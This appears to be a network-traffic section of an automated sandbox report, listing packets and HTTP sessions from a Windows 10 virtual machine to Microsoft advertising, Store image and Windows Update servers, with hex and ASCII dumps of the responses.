Jun 8, 2022 09:53:49.633848906 CEST	49704	443	192.168.2.3	20.82.209.183
Jun 8, 2022 09:53:52.761503935 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.761600018 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.762679100 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.765028000 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.765052080 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.765917063 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.765958071 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.767163992 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.767198086 CEST	443	49707	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.767246008 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.770695925 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.775130987 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.775154114 CEST	443	49707	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.778692007 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.778723955 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.825927019 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.826083899 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.828493118 CEST	443	49707	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.828619957 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.832237959 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.832389116 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.865679026 CEST	49709	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.865716934 CEST	443	49709	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.865881920 CEST	49709	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.872267962 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.872308969 CEST	443	49707	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.872670889 CEST	443	49707	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.872771025 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.872833014 CEST	49707	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.873447895 CEST	49709	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.873465061 CEST	443	49709	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.874258041 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.874360085 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.874515057 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.874542952 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.874811888 CEST	443	49706	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.874891996 CEST	49706	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.877458096 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.877490997 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.877656937 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.877666950 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.878269911 CEST	443	49708	23.211.6.115	192.168.2.3
Jun 8, 2022 09:53:52.878377914 CEST	49708	443	192.168.2.3	23.211.6.115
Jun 8, 2022 09:53:52.891004086 CEST	443	49707	23.211.6.115	192.168.2.3

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2022 09:53:49.039904118 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:49.798000097 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:50.548085928 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:51.313922882 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:52.079493046 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:59.802799940 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:59.812877893 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:59.929595947 CEST	58116	53	192.168.2.3	8.8.8.8
Jun 8, 2022 09:53:59.946887970 CEST	53	58116	8.8.8.8	192.168.2.3
Jun 8, 2022 09:53:59.949321985 CEST	65358	53	192.168.2.3	8.8.8.8
Jun 8, 2022 09:53:59.954632044 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:53:59.976814032 CEST	53	65358	8.8.8.8	192.168.2.3
Jun 8, 2022 09:54:00.553985119 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:00.569602013 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:00.710259914 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:01.304100990 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:01.335355997 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:01.460374117 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:05.949933052 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:05.951384068 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:05.952733994 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:06.694793940 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:06.697693110 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:06.697714090 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:07.460524082 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:07.464581966 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:07.464603901 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:12.853508949 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:12.882452965 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:13.117361069 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:13.159930944 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:13.183517933 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:13.430160999 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:13.472151041 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:13.483525991 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:14.039205074 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:14.081511974 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:14.083652020 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:15.242487907 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:15.284564972 CEST	443	51393	142.250.203.110	192.168.2.3
Jun 8, 2022 09:54:16.868298054 CEST	51393	443	192.168.2.3	142.250.203.110
Jun 8, 2022 09:54:19.387865067 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:19.389317989 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:19.390810966 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:19.393253088 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:19.394682884 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:19.397360086 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149069071 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149169922 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149178982 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149184942 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149384975 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.149394989 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899121046 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899211884 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899216890 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899220943 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899224043 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:54:20.899226904 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:55:10.790477991 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:55:11.554389000 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:55:12.310760975 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:55:53.038134098 CEST	138	138	192.168.2.3	192.168.2.255
Jun 8, 2022 09:57:00.250149012 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:57:00.998106003 CEST	137	137	192.168.2.3	192.168.2.255
Jun 8, 2022 09:57:01.763784885 CEST	137	137	192.168.2.3	192.168.2.255

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:53:49 UTC	0	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220308T163202Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c1b34aff136b43349b443c74f36772f8&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418352&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418352&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1 Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6 Cache-Control: no-cache MS-CV: i4aliLCJNUqJo4L5.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: tch0,m301,m751,mA01,mT01 Host: arc.msn.com Connection: Keep-Alive
2022-06-08 07:53:49 UTC	2	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 167 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"OPTOUTSTATE":"256"}] X-ARC-SIG: BUzDhuGPsPWUcPzSsfwf5qnJTSQuOQjZCGb0QGGkHFDi1ziLjYNOwmP3UxkzGOHoXjU8LrUxiCSma2TfZ0XUm5ub61/IpEymgDuES2mUNFa5Sv75o1kZg33NV3JfUcIWf+yhHBo2zuw4FvpMeyybGCKijB5VFMMKR666r/kyukYy32x7iudmMhgvNtqEwRBfynn72gHlw6OoNI6DtYV482HCOLDT3CcRO1ZvDAFCzzZOLzsHlTG+iwr2AoL0tz9li7/Yf0xQyNBZelYCdATXobjmidyiQS693fthN11JEc0Ynq/yQnMBm6cV1EOEcjmwkaiIj0G2AVtbFH35tLpDlw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Wed, 08 Jun 2022 07:53:49 GMT Connection: close
2022-06-08 07:53:49 UTC	3	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 2c 22 72 65 66 72 65 73 68 74 69 6d 65 22 3a 22 32 30 32 32 2d 30 36 2d 30 38 54 31 31 3a 35 33 3a 34 39 22 7d 7d Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}],"refreshtime":"2022-06-08T11:53:49"}}

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:53:54 UTC	129	OUT	GET /image/apps.256.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.ca4cbefc-0ab0-4144-90c1-07f5250c8c21?format=source HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: store-images.s-microsoft.com Connection: Keep-Alive
2022-06-08 07:53:54 UTC	129	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=7776000, s-maxage=7776000 Content-Length: 11182 Content-Type: image/png Last-Modified: Thu, 30 Sep 2021 03:30:18 GMT Accept-Ranges: none ETag: W/"AEBa1e7txn2TDYI5ywciWaE/GFaMMdQgMHg4RDk4M0MyQTA4MkRBQUM" MS-CV: Yyzz1YfTlk6thXph.0 Access-Control-Expose-Headers: MS-CV Date: Wed, 08 Jun 2022 07:53:54 GMT Connection: close Access-Control-Allow-Origin: *
2022-06-08 07:53:54 UTC	130	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8e 00 00 00 8e 08 02 00 00 00 68 9f a7 5f 00 00 2b 75 49 44 41 54 78 01 d4 97 07 6e ec 3a 0c 45 05 60 c4 f4 be 84 d7 d3 7b dd ff be 3e 43 c3 77 e4 cf 70 28 ca 4a 03 0e 08 0e 33 55 07 97 76 d2 22 ff 04 79 84 de e0 17 d1 ef 25 6b 68 a2 fc 19 9a bc fe 97 d6 fe 72 ad e6 df 17 e3 6f 25 b4 c6 fc 11 7e c7 a0 09 69 a5 a4 5f 30 04 42 56 98 80 8c d2 8a ef e6 38 6f d8 93 0d e6 18 c8 9f 30 51 ac 33 fd 9d b9 d0 7a b5 bf 41 d5 ff f5 10 dc 04 f4 e4 f5 90 15 f7 e8 71 8e e8 bf 28 e3 d7 3e f6 44 fe 0b 2a fc ad 49 48 0f 13 95 24 e9 8e e6 66 45 4a be 3f be b3 2a 88 51 3b 33 71 8c 18 df 0d 58 7f cd 10 d3 1a 9d 99 9c 7c 2c fa 13 db 2d b6 fa fb c3 f0 b1 a7 2a 49 1d ae 31 ef ec 66 f3 64 b1 6c 04 6e 04 9e e8 87 e5 10 73 bc Data Ascii: PNGIHDRh_+uIDATxn:E`{>Cwp(J3Uv"y%khro%~i_0BV8o0Q3zAq(>DIH$fEJ?Q;3qX\|,-*I1fdlns

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:56:59 UTC	9438	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ27N&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165616Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:56:59 UTC	9439	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: b1ff1a96-ad32-46bd-b3b0-506ba15ae042 Date: Wed, 08 Jun 2022 07:56:59 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:56:59 UTC	9439	OUT	GET /v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400089837&UIT=P-&TargetID=700129702&AN=679670357&PG=PC000P0FR5.0000000IRT&REQASID=8269C44C06284E1CA50E8D554A67885C&UNID=338388&ASID=b294f7550fc04b4bb1601ebac6b0c790&PERSID=DBDE13DC697F71846A990CDFDC016FBD&GLOBALDEVICEID=6755432004667435&LOCALID=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&DS_EVTID=e4c7f4e268ec427292df4f5be8ee76cd&DEVOSVER=10.0.17134.1&REQT=20220608T075602&TIME=20220608T165641Z&ARCRAS=&CLR=CDM HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:00 UTC	9440	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 41b7167b-bb64-4c32-9b2e-1ab290647864 Date: Wed, 08 Jun 2022 07:56:59 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:00 UTC	9441	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:00 UTC	9442	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: 78973794-efc8-4a4b-a2f6-a1f8fe7270e0 MS-RequestId: f0fdd90c-0cec-4cdc-bb92-267400c2b4dc MS-CV: H8i3p+6ghkmhDiPK.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:00 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:00 UTC	9442	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:00 UTC	9458	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
2022-06-08 07:57:00 UTC	9474	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:00 UTC	9477	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ140&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165620Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:00 UTC	9478	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: df32fa13-f2ca-4bea-aeb8-9bade9f831d9 Date: Wed, 08 Jun 2022 07:57:00 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:01 UTC	9479	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:01 UTC	9480	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: 0d313e2b-1695-4327-91f1-7b2eead549bf MS-RequestId: 6e735f89-4f3f-4b53-85f6-c7546dbacda5 MS-CV: A2vDnV/3jkm1rpsN.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:00 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:01 UTC	9480	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:01 UTC	9496	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
